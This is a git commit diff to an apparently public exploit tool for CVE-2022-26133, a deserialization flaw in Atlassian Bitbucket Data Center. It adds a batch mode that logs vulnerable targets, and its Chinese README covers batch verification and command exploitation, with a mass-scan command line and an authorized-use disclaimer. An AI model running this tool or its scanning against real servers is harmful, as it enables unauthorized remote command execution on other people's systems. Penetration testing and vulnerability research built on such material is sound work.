update README

CVE-2022-26133.py

@@ -79,7 +79,7 @@ def generate_payload(self, cluster, command):
         # logging.info("payload: " + payload)
         return payload
 
-    def verify(self):
+    def verify(self, Batch=False):
 
         logging.debug("Checking " + self.url)
 
@@ -94,9 +94,10 @@ def verify(self):
 
                 if len(ClusterName) != 0:
                     logging.info("\033[0;36mTarget is vulnerable.\033[0m")
-                    with open("success.txt", "a+") as fo:
-                        fo.write(self.url + "\n")
-                    fo.close()
+                    if Batch != False:
+                        with open("success.txt", "a+") as fo:
+                            fo.write(self.url + "\n")
+                        fo.close()
 
                     return ClusterName
 
@@ -151,6 +152,6 @@ def exploit(self, command):
             targets = f.readlines()
             f.close()
             for target in targets:
-                CVE_2022_26133(target.strip()).verify()
+                CVE_2022_26133(target.strip()).verify(True)
     elif args.command:
         CVE_2022_26133(args.url).exploit(args.command)

README.md

@@ -1,21 +1,33 @@
 # CVE-2022-26133
 
 
-## 说明
-
-Atlassian Bitbucket Data Center反序列化漏洞(CVE-2022-26133)批量验证和利用
 
 
+## 说明
 
-## 用法示例
+Atlassian Bitbucket Data Center 反序列化漏洞(CVE-2022-26133) 批量验证和利用
 
 ![image-20220510141355733](images/image-20220510141355733.png)
 
-漏洞验证
+
+
+## 漏洞验证
 
 ![image-20220509202724404](images/image-20220509202724404.png)
 
+批量
+
+```
+python3 CVE-2022-26133.py -u http://192.168.110.136:7990 -f target.txt
+```
+
+
+
+## 漏洞利用
+
+![image-20220511095619698](images/image-20220511095619698.png)
 
+![image-20220511095801769](images/image-20220511095801769.png)
 
 ***声明：该工具仅用于合法的，经过授权的渗透测试，公司内部安全检查与研究使用。由于使用本工具带来的不良后果由使用者本人负责。***